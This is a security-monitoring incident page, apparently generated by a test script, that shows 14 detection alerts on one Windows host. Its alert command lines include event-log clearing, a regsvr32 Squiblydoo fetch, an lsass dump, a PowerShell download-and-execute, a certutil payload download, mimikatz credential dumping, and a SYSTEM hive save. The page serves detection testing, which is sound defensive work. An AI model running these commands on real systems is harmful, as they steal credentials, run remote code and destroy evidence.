Back to list

Critical CINC-20251221-ED5B9909 new

Aggregate ID: aggind:47186ef241ea495885522e5d4930eda3:9223083670

Incident Overview

Incident ID CINC-20251221-ED5B9909
Severity Critical (90)
Status new
Alert Count 14
Host Count 1

Timeline

First Seen 2025-12-22 07:20:19
Last Seen 2025-12-22 07:21:47
Duration 0d 0h 1m
Created 2025-12-22 08:36
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Defense Evasion Execution Credential Access Command and Control
Techniques:
Indicator Removal User Execution Regsvr32 OS Credential Dumping PowerShell Ingress Tool Transfer

Affected Hosts (1)

TEAHEE

Related Alerts (14)

Severity Status Hostname Description Tactic Command Line Time
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-22 07:21
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-22 07:21
Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-22 07:21
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-22 07:21
High new TEAHEE An unusual process accessed lsass. This might indicate an attempt to dump credentials. Investigate the process tree. Credential Access C:\WINDOWS\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\dokji\AppData\Local\Temp\lsass.dmp" 12-22 07:21
High new TEAHEE An unusual process accessed lsass. This might indicate an attempt to dump credentials. Investigate the process tree. Credential Access C:\WINDOWS\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\dokji\AppData\Local\Temp\lsass.dmp" 12-22 07:21
High new TEAHEE A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line. Execution C:\WINDOWS\system32\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/ps')"" 12-22 07:21
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/mal.exe C:\Users\dokji\AppData\Local\Temp\cert_test.exe 12-22 07:21
High new TEAHEE A process appears to be launching mimikatz, a password dumping utility. mimikatz's primary purpose is to steal passwords. If credentials were dumped, change your passwords and investigate further. Credential Access C:\WINDOWS\system32\cmd.exe /c "powershell -c "sekurlsa::logonpasswords"" 12-22 07:21
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-22 07:21
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-22 07:21
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-22 07:21
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\system.hiv 12-22 07:21
Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-22 07:20